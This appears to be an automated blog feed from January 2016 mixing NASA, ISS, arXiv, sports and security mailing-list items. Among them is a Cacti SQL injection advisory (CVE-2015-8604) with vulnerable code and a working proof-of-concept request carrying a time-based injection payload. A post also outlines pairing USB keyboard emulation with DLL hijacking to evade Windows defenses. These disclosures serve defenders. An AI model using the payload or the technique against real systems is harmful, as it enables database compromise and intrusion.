Latest YouTube Video

Saturday, January 9, 2016

I have a new follower on Twitter


Onur Akpolat
Co-Founder & CTO @Tapglue. We enable #mobile developers to create #social apps. I tweet about #tech, #startups #analytics #data informed #app #development.
Berlin
http://t.co/4lYE5N3UJf
Following: 1469 - Followers: 28374

January 09, 2016 at 05:59PM via Twitter http://twitter.com/onurakpolat

I have a new follower on Twitter


James Patrick
Growth hacker for @unreel_co, the best video discovery platform out there. Check it out at https://t.co/7uQGTsaNTs! I also love writing, baseball, and humor!


Following: 2298 - Followers: 3019

January 09, 2016 at 11:20AM via Twitter http://twitter.com/jamespatrickyup

602 Gbps! This May Have Been the Largest DDoS Attack in History

Cyber attacks are getting evil and worst nightmare for companies day-by-day, and the Distributed Denial of Service (DDoS) attack is one of the favorite weapon for hackers to temporarily suspend services of a host connected to the Internet. Until now, nearly every big website had been a victim of this attack, and the most recent one was conducted against the BBC's websites and Republican


from The Hacker News http://ift.tt/1ZTlblp
via IFTTT

Prometheus and the F Ring


In Greek myth Prometheus was a Titan, known for bringing fire from Mount Olympus. But in modern times the name is given to a small moon of Saturn, orbiting just inside Saturn's F ring. In a complex interaction, the tiny potato-shaped moon interacts with the icy ring particles creating structures along the F ring still not fully understood. One of the highest resolution views of Prometheus, this image of its pocked surface posing with the thin F ring in the background was taken during the Cassini spacecraft's close approach on December 6, 2015. Prometheus is about 86 kilometers (50 miles) across. via NASA http://ift.tt/1IUoZOY

Sea Surface Temperature Anomaly and Terrestrial Water Storage Anomaly Comparison

Sea Surface Temperature Anomalies (SSTA) show ocean regions with warmer or colder temperatures than the long-term average for a given month. Globally, SSTA are an important driver of atmospheric circulation and rainfall patterns. Climate modes such as the El Nino Southern Oscillation (ENSO) in the tropical Pacific Ocean, including El Nino (warm SSTA) and La Nina (cold SSTA) phases, give us rise to predictable changes in rainfall patterns. The strong El Nino event that develped in 2015 appears as warm SSTA in the easter Pacific Ocean. Changing ocean temperatures reduced rainfall in Indonesia and the eastern Amazon, with large increases in fire activity under drought conditions. The impact of SSTA on rainfall was also detected as a Terrestrial Water Storage Anomaly (TWSA) on land by NASA's twin GRACE satellites. The GRACE satellites monitor changes in Earth's gravity from the movement of water. Drought conditions appear as negative TWSA, highlighting areas with greater fire risk as soil water is depleted. This visualization attempts to explore the connections between SSTA and TWSA, including the lag times between changing ocean temperatures and terrestrial water storage, as climate modes linked to tropical ocean temperatures redistribute rainfall across the globe. For more information on the GRACE mission please visit http://ift.tt/1z7Hogm

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1ReA7Ji
via IFTTT

Terrestrial Water Storage Anomaly 2002 - 2015

A pair of experimental twin satellites called the Gravity Recovery And Climate Experiment, or "GRACE", were launched in March 2002. Since then they have been collecting gravity measurements which scientists use to derive Terrestrial Water Storage Anomalies (TWSA). TWSA can then be used as an indicator for drought and flood conditions across the globe. For more information on the GRACE mission please visit http://ift.tt/1z7Hogm

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1POFz2m
via IFTTT

Friday, January 8, 2016

I have a new follower on Twitter


Data Visualizer
Super Easy Data Visualization and Self service analysis [https://t.co/H2f0POEqlA] #hadoop #DataWarehouse #dashboards #analytics #BusinessIntelligence #dataviz

http://t.co/H2f0POEqlA
Following: 2602 - Followers: 3144

January 08, 2016 at 07:20PM via Twitter http://twitter.com/infocaptor

[FD] Executable installers are vulnerable^WEVIL (case 20): TrueCrypt's installers allow arbitrary (remote) code execution and escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 19): ZoneAlarm's installers allow arbitrary (remote) code execution and escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 18): EMSISoft's installers allow arbitrary (remote) code execution and escalation of privilege

[FD] MobaXTerm before version 8.5 vulnerability in "jump host" functionality

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Combining DLL hijacking with USB keyboard emulation based attacks

Many of us have now been long aware of the possibility of programming an USB device to emulate a keyboard and automatically send keystrokes in order to perform malicious actions on a computer. Some of the most interesting payloads that can be used with this technique are based around downloading or creating an executable file and then running it. However, defenses such as Windows' User Account Control (UAC) and SmartScreen might make this more complicated. While it's certainly possible to bypass them by sending the right sequence of keystrokes, they tend to make the payload longer, less stealthy and more likely to fail. I'd like to bring to light that this attack could be combined with DLL hijacking, with some benefits for the attacker. For instance, a payload which simply downloads a DLL to the current user's folder tends to complete faster and be more reliable than one which tries to transfer an executable AND immediately run it. The DLL would then most likely be found and executed by a vulnerable installer, such as described by this Matt Howard's thread from 2012 on this list <http://ift.tt/1PjCGng; and brought up again by the more recent efforts of Stefan Kanthak <http://ift.tt/1OSR4Zs;. This way, there would be no need for embeeding in the payload a complicated attempt of bypassing the active defense mechanisms.

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2016-01-07-1 QuickTime 7.7.9

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Serendipity Security Advisory - XSS Vulnerability - CVE-2015-8603

Information

Source: Gmail -> IFTTT-> Blogger

[FD] OpenCart Security Advisory - XSS Vulnerabiltiy - CVE-2015-4671

Information

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2015-8604] Cacti SQL injection in graphs_new.php

Application: Cacti Vendor URL: http://www.cacti.net Bugs: SQL injection Author:changzhao.mao(DBAPPSecurity Ltd) Version affected: 0.8.8f and prior ================================ Introduction ================================ Cacti is a complete frontend to RRDTool, it stores all of the necessary information to create graphs and populate them with data in a MySQL database. The frontend is completely PHP driven. Along with being able to maintain Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the data gathering. There is also SNMP support for those used to creating traffic graphs with MRTG. SQL injection vulnerabilities has been discovered.The vulnerability allows any users to execute own sql commands to compromise the web-applicaation or database management system. SQL injection Vulnerability has been discovered in Cacti(0.8.8f) and prior , which can be exploited by any user to conduct SQL Injection attacks.A patch has been released http://ift.tt/1ZSO3KB . ================================ [Vulnerability info] ================================ in graphs_new.php , trace parameter cg_g function form_save() { if (isset($_POST["save_component_graph"])) { /* summarize the 'create graph from host template/snmp index' stuff into an array */ while (list($var, $val) = each($_POST)) { if (preg_match('/^cg_(\d+)$/', $var, $matches)) { $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true; //cg_g is not filtered }elseif (preg_match('/^cg_g$/', $var)) { if ($_POST["cg_g"] > 0) { $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true; } }elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) { $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true; } } if (isset($selected_graphs)) { host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs); exit; } header("Location: graphs_new.php?host_id=" . $_POST["host_id"]); } if (isset($_POST["save_component_new_graphs"])) { host_new_graphs_save(); header("Location: graphs_new.php?host_id=" . $_POST["host_id"]); } } function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) { /* we use object buffering on this page to allow redirection to another page if no fields are actually drawn */ ob_start(); include_once("./include/top_header.php"); print "
\n"; $snmp_query_id = 0; $num_output_fields = array(); while (list($form_type, $form_array) = each($selected_graphs_array)) { while (list($form_id1, $form_array2) = each($form_array)) { if ($form_type == "cg") { $graph_template_id = $form_id1; //sql injection in graph_template_id html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", ""); }elseif ($form_type == "sg") { while (list($form_id2, $form_array3) = each($form_array2)) { /* ================= input validation ================= */ input_validate_input_number($snmp_query_id); /* ==================================================== */ $snmp_query_id = $form_id1; $snmp_query_graph_id = $form_id2; ================================ [Exploit] ================================ POC: POST /cacti/graphs_new.php HTTP/1.1 Host: 192.168.217.133 Content-Type: application/x-www-form-urlencoded Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2 Content-Length: 189 __csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

Source: Gmail -> IFTTT-> Blogger

[FD] Security BSides Ljubljana 0x7E0 CFP - March 9, 2016

-=[ #BSidesLjubljana ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Event info: BSidesLjubljana - http://ift.tt/1n8KilZ Date: March 9th, 2016 Venue: Poligon creative centre, Ljubljana, Slovenia, Europe CFP URL: http://ift.tt/1POqmhI CFP Submit form: http://goo.gl/forms/rzLHcHBHau Email: cfp[at]bsidesljubljana.si Twitter: @BSidesLjubljana -=[ CALL FOR PAPERS ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- After great success of first Security B-Sides Ljubljana [1], we are pleased to announce second one - BSidesLjubljana 0x7E0. BSides is community driven information security conference that will be held March 9, 2016 in Ljubljana, Slovenia, day after Cloud Security Alliance CEE Summit 2016 [2]. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- We are looking for speakers, sponsors and everyone in between! Topics of interest include (but are in no way limited to) the following, preference given to talks that actually provide solutions as well as insight to problems: [*] Information technology [*] Network security [*] Web Application security [*] Mobile security [*] Car/Vehicles hacking [*] Virtualization and cloud computing [*] Innovative attack / defense strategies [*] Forensics [*] Malware analysis and new trends in malicious codes [*] Embedded device security / Internet of things [*] Biometrics [*] Hardware hacking [*] Phone phreaking [*] Penetration testing and security assessment [*] Biohacking [*] Privacy issues: LPM, LOPPSI, HADOPI, – Industrial espionage, cyberwar [*] Open source software [*] Evolutionary computing [*] Robotics (bonus points for bringing an actual robot) [*] Massive abuse of technology (If it is not on the list but want to submit anyway, please do so and we’ll be glad to consider it!) Please submit entries via: http://goo.gl/forms/rzLHcHBHau -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- We are planning several participation formats. The terms and conditions are described below: #1. 40 minutes talk The speaker is granted 40 minutes to present his/her paper and 15 minutes to answer questions in one of the two halls where the event will be held. #2. Lightning talks The speaker is granted 10 minutes to present his/her paper and 5 minutes to answer questions in a separate hall. (For this type of format you register talk at event) #3. Workshop The speaker prepares his/her presentation and any training materials he/she needs. He/she is granted 2 or more hours to conduct the master class in a separate hall/room. Please submit your talk/workshop proposals via http://goo.gl/forms/rzLHcHBHau We do not accept marketing and non-technical commercial papers as well as same talk proposals submitted to CSA CEE Summit CfP. Sorry. The accepted language is English. We can’t wait to see your ideas! -=[ TIMELINE ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 2015 December 16th: CfP Open [*] 2016 February 1st: CFP Deadline [*] 2016 February 9th: Acceptance Notification [*] 2016 March 8th: CSA CEE Summit 2016 [*] 2016 March 9th: \o/ BSides Ljubljana 0x7E0 \o/ -=[ Are you interested in sponsoring us? ]=-=-=-=-=-=-=-=-=-= BSides Ljubljana is a non-profit community driven event, and relies on the kind sponsorship of people and companies like you to succeed. If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to 'sponsorship [at] bsidesljubljana.si'. If you have any questions, please certainly feel free to contact me directly. Thanks! [1] http://ift.tt/1n8Kim0 [2] http://ift.tt/1Cc8Mwd [3] http://ift.tt/1n8KilZ [4] http://ift.tt/1POqmhI [5] http://goo.gl/forms/rzLHcHBHau

Source: Gmail -> IFTTT-> Blogger

Ravens: RG Marshal Yanda named first-team All-Pro for a second straight season (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: WR Steve Smith, who put off retirement after suffering a torn Achilles, live on SportsCenter on ESPN (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Police Arrested Hackers Who Stole Millions from European ATMs

Romanian law enforcement authorities have arrested eight cyber criminals suspected of being part of an international criminal gang that pilfered cash from ATMs (automatic teller machines) using malware. The operation said to be one of the first operations of this type in Europe, was conducted in Romania and Moldova by Romanian National Police and the Directorate for Investigating Organised


from The Hacker News http://ift.tt/1ZRVDVA
via IFTTT

ISS Daily Summary Report – 1/7/16

Waste and Hygiene Compartment (WHC) Liquid Carryover Issue:  This morning, the liquid carryover sensor in the WHC annunciated resulting in a shutdown of the WHC. This sensor is downstream of the Wring Collector (COT) and detects an overflow condition in the WHC.  This afternoon, when the crew opened the WHC panel, they found a large pretreated urine leak around the pump separator, and donned protective gear to clean it up.  Tomorrow the crew will replace the pump separator, COT, liquid carryover sensor and air hose.  WHC is currently not available for use, the crew will use the Russian [АСУ].   Water Processor Assembly (WPA) Faults:  The WPA faulted during two process cycles due to off nominal signatures at the catalytic reactor.  The team is assessing the signatures.   Russian Treadmill (БД-2):  Yesterday, the Russian crew reported a rubber shock absorbing belt within the БД-2 was torn.  Photos have been downlinked for ground analysis. MCC-M confirmed that no spares are currently onboard ISS and have asked for the Russian Crew to use Treadmill 2 until a spare can be flown.   Extravehicular Activity (EVA) Preparation:  All three USOS Crew continued to prepare for the Sequential Shunt Unit (SSU) EVA scheduled next Friday, January 15th.   Today, they performed an EVA procedure review then followed up with a conference with ground specialists to answer any questions.  In addition, Kopra and Peake utilized a Virtual Reality Trainer (VRT) in order to re-familiarize themselves with Simplified Aid for EVA Rescue (SAFER) operations.   Robotics Refueling Mission (RRM):  Peake opened the outer hatch and extended the Japanese Experiment Module (JEM) Airlock Slide Table out to the JEM Exposed Facility on the exterior of the ISS.  Yesterday, the RRM Task Board 4 was removed from the ExPRESS Logistics Carrier-4 (ELC-4), located on the ISS Starboard 3 Truss.  Today, Ground controllers performed a Mobile Transporter (MT) translation from Worksite (WS) 2 to WS 7 and transferred the Task Board onto the JEM Airlock Slide Table.  Later tonite, the failed Robotic Micro Conical Tool (RMCT)-1 will be transferred to the Task Board, and both brought inside the JEM Airlock.   Cardiac and Vessel Structure and Function with Long-Duration Space Flight and Recovery (Vascular Echo) Checkout:  Peake completed the Vascular Echo Doppler Ultrasound protocol, taking scans of his neck, thigh and heart.  The Vascular Echo experiment investigates the stiffening of the arteries and increased blood pressure (hypertension) observed in some returning ISS crewmembers.  By observing changes in blood vessels and the heart while the crew members are in space and following their recovery on return to Earth, investigators hope to identify potential countermeasures.   Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Max:  For his Flight Day 285 Sprint VO2 Max session, Kelly attached Electrocardiogram (ECG) electrodes to himself, set up and donned Heart Rate Monitor hardware, performed Portable Pulmonary Function System calibrations, and then performed the VO2 protocol.  The Sprint VO2 investigation evaluates the use of high intensity, low volume exercise to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers while reducing total exercise time during long-duration space missions   Habitability:  Kelly documented his recent observations related to human factors and habitability for the Habitability investigation.  Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars.  Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.   Fine Motor Skills:  Kopra completed a session of the Fine Motor Skills experiment today.  During the experiment he performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity.   Today’s Planned Activities All activities were completed unless otherwise noted. Biological Rhythms 48 Multi Media Card Exchange Cleaning panel vent screens (panels 116, 316, 231, 431) Environmental Control and Life Support (ECL) Air Quality Survey EVA Procedure Review Extravehicular Activity (EVA) Procedure Conference GREAT START. Video Script Review Health Maintenance System (HMS) Food Frequency Questionnaire (FFQ) FE-5 Health Maintenance System (HMS) Spaceflight Cognitive Assessment Tool for Windows (WinSCAT) Test IMS Delta file prep INTERACTION-2. Experiment Ops JEM Airlock Slide Table extension to JEF side Kulonovskiy Kristall Experiment Run KULONOVSKYI KRISTALL. Copy and Downlink Data Labeling Soyuz 719 tablet computer MRM2 comm config to support the P/L Ops MRM2 Comm Reconfig for Nominal Ops Photography of SM interior panels Program Management/ISS CREW Conference Public Affairs Office (PAO) Event in High Definition (HD) TV-session with His Holiness Kirill, Patriarch of Moscow and All Russia Rechargeable EVA Battery Assembly (REBA) Installation Rechargeable EVA Battery Assembly (REBA) Powered Hardware Checkout Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Drain Initiation Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Drain Termination Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Quick Disconnect (QD) Reconfig [Deferred] Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Remove and Replace Regenerative Environmental Control and Life Support System (RGN) WSTA Fill  [Deferred] Reminder Fluid Shifts Baseline Imaging Measures Reminder for Actiwatch Reminder1 Vascular Echo Exercise Portable Doppler Measurement Reminder2 Vascular Echo Portable Doppler Measurement Reminder2 Vascular Echo Ultrasound Scan Repairs of SM Interior Panel 335 by Installing Overlay Panel – Day 2. Rodent Research MSG Hardware Gather SM Ventilation System Preventive Maintenance. Group В2 Smart switch router (БРИ) protocols downlink from RSS1 Vascular Echo CDL Holter Arterial BP Measurement – Subject Vascular Echo Ultrasound Scan 105 Minutes – FE6 Video recording for Nauka channel Virtual Reality Training (VRT) Extravehicular Activity (EVA) Simplified Aid for EVA Rescue (SAFER) Zinnia Maintenance Guide Включение питания HAM-видео СОЖ maintenance ТКГ 431 (DC1) Transfers and IMS Ops   Completed Task List Items None   Ground Activities All activities were completed unless otherwise noted. MT Translation from WS2 […]

from ISS On-Orbit Status Report http://ift.tt/1mI1xLh
via IFTTT

Anonymous busybody upset rehabilitated convict found gainful employment

"....an anonymous letter was sent recently to media outlets, including the Milwaukee Journal Sentinel, questioning why Sheboygan County employees ...

from Google Alert - anonymous http://ift.tt/1S7FD0g
via IFTTT

[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of arbitrary customers when receiving manipulated CWMP packets. These credentials can then be used by an attacker to register any VoIP number of the victim. This enables the attacker to place and receive calls on behalf of the attacked user. Details ======= Product: o2 DSL Auto Configuration Server Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://o2online.de/ Vendor Status: fixed Advisory URL: http://ift.tt/1VP0lBm Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: http://ift.tt/1jQGmEN Introduction ============ TR-069 (Technical Report 069) is a Broadband Forum technical specification entitled "CPE WAN Management Protocol" (CWMP). It defines an application layer protocol for remote management of end-user devices. (from Wikipedia) A more technical introduction to TR-069 can be found in a deck of slides which the Interoperability Laboratory at the University of New Hampshire has published on that topic [0]. More Details ============ The German Internet Service Provider o2 uses the TR-069 protocol for the provisioning of Customer Premises Equipment (CPE). Among other settings, VoIP/SIP credentials are transferred and VoIP telephony is set up. In our setup, an AVM FRITZ!Box 7490 was monitored during the initial autoconfiguration process. During that process, several CWMP messages are exchanged. These CWMP messages are transferred via HTTPS as SOAP requests and replies. The HTTPS connection is always established by the CPE which connects to the Auto Configuration Server (ACS). According to the CWMP, the CPE may do so on the occasion of several events, including, but not limited to: * BOOTSTRAP - first contact between CPE and ACS * BOOT - when CPE has rebooted * PERIODIC - after a period of time, defined by the ACS * CONNECTION REQUEST - ACS signals a connection request to the CPE via a second HTTP channel The "CONNECTION REQUEST" is the only event that can be triggered by the ACS. To do so, the ACS establishes an unencrypted HTTP connection to the CPE and authenticates via HTTP basic access authentication with a "ConnectionRequestUsername" and a "ConnectionRequestPassword". No further data is exchanged on that channel. Once the CPE has verified the credentials, it then initiates the real CWMP conversation by sending a CWMP-Inform message to the pre-defined ACS. The connection initiated by the CPE is TLS-secured and the CPE provides a username (ManagementServer.Username) and a password (ManagementServer.Password) to authenticate itself towards the ACS. A typical CWMP conversation (including the "CONNECTION REQUEST" event) is depicted below:

Source: Gmail -> IFTTT-> Blogger

High Energy Andromeda


A mere 2.5 million light-years away, the Andromeda Galaxy, also known as M31, really is just next door as large galaxies go. In this (inset) scan, image data from NASA's Nuclear Spectrosopic Telescope Array has yielded the best high-energy X-ray view yet of our large neighboring spiral, revealing some 40 extreme sources of X-rays, X-ray binary star systems that contain a black hole or neutron star orbiting a more normal stellar companion. In fact, larger Andromeda and our own Milky Way are the most massive members of the local galaxy group. Andromeda is close enough that NuSTAR can examine its population of X-ray binaries in detail, comparing them to our own. The background image of Andromeda was taken by NASA's Galaxy Evolution Explorer in energetic ultraviolet light. via NASA http://ift.tt/1Uz6qjW

Thursday, January 7, 2016

Complexity of Shift Bribery in Committee Elections. (arXiv:1601.01492v1 [cs.AI])

We study the (parameterized) complexity of SHIFT BRIBERY for multiwinner voting rules. We focus on SNTV, Bloc, k-Borda, and Chamberlin-Courant, as well as on approximate variants of Chamberlin-Courant, since the original rule is NP-hard to compute. We show that SHIFT BRIBERY tends to be significantly harder in the multiwinner setting than in the single-winner one by showing settings where SHIFT BRIBERY is easy in the single-winner cases, but is hard (and hard to approximate) in the multiwinner ones. Moreover, we show that the non-monotonicity of those rules which are based on approximation algorithms for the Chamberlin-Courant rule sometimes affects the complexity of SHIFT BRIBERY.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1OQtgp2
via IFTTT

Toward Organic Computing Approach for Cybernetic Responsive Environment. (arXiv:1601.01614v1 [cs.AI])

The developpment of the Internet of Things (IoT) concept revives Responsive Environments (RE) technologies. Nowadays, the idea of a permanent connection between physical and digital world is technologically possible. The capillar Internet relates to the Internet extension into daily appliances such as they become actors of Internet like any hu-man. The parallel development of Machine-to-Machine communications and Arti cial Intelligence (AI) technics start a new area of cybernetic. This paper presents an approach for Cybernetic Organism (Cyborg) for RE based on Organic Computing (OC). In such approach, each appli-ance is a part of an autonomic system in order to control a physical environment. The underlying idea is that such systems must have self-x properties in order to adapt their behavior to external disturbances with a high-degree of autonomy.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1ZQShCl
via IFTTT

Fuzzy Object-Oriented Dynamic Networks. I. (arXiv:1601.01635v1 [cs.AI])

The concepts of fuzzy objects and their classes are described that make it possible to structurally represent knowledge about fuzzy and partially-defined objects and their classes. Operations over such objects and classes are also proposed that make it possible to obtain sets and new classes of fuzzy objects and also to model variations in object structures under the influence of external factors.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1ZQShCj
via IFTTT

Large Collection of Diverse Gene Set Search Queries Recapitulate Known Protein-Protein Interactions and Gene-Gene Functional Associations. (arXiv:1601.01653v1 [q-bio.MN])

Popular online enrichment analysis tools from the field of molecular systems biology provide users with the ability to submit their experimental results as gene sets for individual analysis. Such queries are kept private, and have never before been considered as a resource for integrative analysis. By harnessing gene set query submissions from thousands of users, we aim to discover biological knowledge beyond the scope of an individual study. In this work, we investigated a large collection of gene sets submitted to the tool Enrichr by thousands of users. Based on co-occurrence, we constructed a global gene-gene association network. We interpret this inferred network as providing a summary of the structure present in this crowdsourced gene set library, and show that this network recapitulates known protein-protein interactions and functional associations between genes. This finding implies that this network also offers predictive value. Furthermore, we visualize this gene-gene association network using a new edge-pruning algorithm that retains both the local and global structures of large-scale networks. Our ability to make predictions for currently unknown gene associations, that may not be captured by individual researchers and data sources, is a demonstration of the potential of harnessing collective knowledge from users of popular tools in the field of molecular systems biology.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1PRylMP
via IFTTT

Multimodal Hierarchical Dirichlet Process-based Active Perception. (arXiv:1510.00331v2 [cs.RO] UPDATED)

In this paper, we propose an active perception method for recognizing object categories based on the multimodal hierarchical Dirichlet process (MHDP). The MHDP enables a robot to form object categories using multimodal information, e.g., visual, auditory, and haptic information, which can be observed by performing actions on an object. However, performing many actions on a target object requires a long time. In a real-time scenario, i.e., when the time is limited, the robot has to determine the set of actions that is most effective for recognizing a target object. We propose an MHDP-based active perception method that uses the information gain (IG) maximization criterion and lazy greedy algorithm. We show that the IG maximization criterion is optimal in the sense that the criterion is equivalent to a minimization of the expected Kullback--Leibler divergence between a final recognition state and the recognition state after the next set of actions. However, a straightforward calculation of IG is practically impossible. Therefore, we derive an efficient Monte Carlo approximation method for IG by making use of a property of the MHDP. We also show that the IG has submodular and non-decreasing properties as a set function because of the structure of the graphical model of the MHDP. Therefore, the IG maximization problem is reduced to a submodular maximization problem. This means that greedy and lazy greedy algorithms are effective and have a theoretical justification for their performance. We conducted an experiment using an upper-torso humanoid robot and a second one using synthetic data. The experimental results show that the method enables the robot to select a set of actions that allow it to recognize target objects quickly and accurately. The results support our theoretical outcomes.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1YSxgHU
via IFTTT

MazeBase: A Sandbox for Learning from Games. (arXiv:1511.07401v2 [cs.LG] UPDATED)

This paper introduces MazeBase: an environment for simple 2D games, designed as a sandbox for machine learning approaches to reasoning and planning. Within it, we create 10 simple games embodying a range of algorithmic tasks (e.g. if-then statements or set negation). A variety of neural models (fully connected, convolutional network, memory network) are deployed via reinforcement learning on these games, with and without a procedurally generated curriculum. Despite the tasks' simplicity, the performance of the models is far from optimal, suggesting directions for future development. We also demonstrate the versatility of MazeBase by using it to emulate small combat scenarios from StarCraft. Models trained on the MazeBase version can be directly applied to StarCraft, where they consistently beat the in-game AI.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1kQLyt7
via IFTTT

Ravens: Team expects LB Terrell Suggs to return for 2016; suffered season-ending Achilles injury in Week 1 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 1/6/16

Kubik-6 Ebox Exchange:  Yesterday, Kelly unstowed the European Space Agency (ESA) Kubik-6 facility and exchanged the centrifuge and thermal eBoxes in preparation for the Kubik-6 commissioning.  Today he activated and checked out the facility.  Kubik is a small controlled-temperature incubator / cooler used to study biological samples in a microgravity environment.  It is equipped with removable inserts designed for self-contained, automatic experiments using seeds, cells, or small animals.    Japanese Experiment Module (JEM) Airlock Operations for Robotics Refueling Mission (RRM) Task Board 4 Retrieval:  Peake depressurized and vented the JEM Airlock today in preparation for the retrieval of RRM Task Board 4 (TB4) from the ExPRESS Logistics Carrier-4 (ELC-4), located on the ISS Starboard 3 (S3) Truss.   Fluid Shifts Before, During and After Prolonged Space Flight and Their Association with Intracranial Pressure and Visual Impairment (Fluid Shifts): Kelly continued his Return-45 (R-45) multi-day session with baseline imaging collection, including Optical Coherence Tomography (OCT), Distortion Product Otoacoustic Emissions (DPOAE), Tonometry, and Ultrasounds.  Kopra assisted him as the operator.  Fluid Shifts investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage.   Biological Rhythms 48 Hours:  Kopra donned the Holter Electrocardiogram to support JAXA’s Biological Rhythms 48 Hours investigation.  He then synchronized data between the Actiwatch and Holter.  This investigation studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. While the ISS schedule follows Greenwich Mean Time, it is not known whether a separate biological rhythm is imposed on long-term flight crews. To study this, astronauts wear an Actiwatch for 96 hours and a Holter electrocardiograph for 48 hours.   Dose Tracker:  Kopra and Peake completed entries for medication tracking on an iPad.  This investigation documents the medication usage of crew members before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data are expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions.   Russian Pilot-T Experiment:  Kelly performed a session of the Russian experiment Pilot-T today. The goal of Pilot-T is to improve methods and develop equipment to assess and predict crewmember performance reliability during the execution of complex operator tasks (such as piloting a space vehicle or controlling transport and robotic equipment on the surface of a spacecraft) during various stages of long-term spaceflight.   Sequential Shunt Unit (SSU) Extravehicular Activity (EVA) Preparation:  Kopra and Peak worked together to remove arm sizing rings from Extravehicular Mobility Unit (EMU) 3005 in support of resizing activity later in the day.  EMU 3005 was then uninstalled from the Aft EMU Don/Doff Assembly (EDDA) and EMU 3011 was installed in its place.  Later, EMU 3008 was resized for Peake and EMU 3011 for Kopra.  The crew also manually removed gas from the payload water reservoir, recharged the EMU feed water tank, filled a dry Liquid Cooling and Ventilation Garment (LCVG), and performed a tether inspection.  The SSU EVA is scheduled to occur next week on January 15th.   Mobile Servicing System (MSS) Operations:  Yesterday evening, the Robotics Ground Controllers continued reconfiguring tools and adapters on RRM TB4.  This afternoon, TB4 was removed from RRM using the SPDM Robot Micro Conical Tool 2 (RMCT2).   Tomorrow, the Mobile Transporter will be moved to Worksite 7 to allow access to the JEM Airlock Slide Table.  TB4 will be placed on the Slide Table Thursday night, along with the failed RMCT1, in order to bring both items inside the ISS for return on SpX-8.   Russian Treadmill (БД-2):  The Russian crew reported a rubber shock absorbing belt in the БД-2 was torn.  Photos have been downlinked for ground analysis.   Today’s Planned Activities All activities were completed unless otherwise noted. Sprint Portable Pulmonary Function System (PPFS) Partial Setup Fluid Shifts Experiment USOS EVA – Enhanced Caution and Warning System (ECWS) On-Board Training SM Ventilation System Preventive Maintenance. Group А Photo/TV Battery Charge Initiation Soyuz 718 Samsung Tablet Recharge – Initiate Audit of Docking and Internal Transfer System (ССВП) accessories, kits COSMOCARD. Closeout Ops Portable Power Supply (PPS) – Settings BLR48 – starting measurement PPS – Settings Adjustment PILOT-T. Preparation for the experiment VCA1 Camera Adjustment JEMAL – Depress and Vent USND2 – Hardware Activation ARED Flywheel Cylinder Evacuation 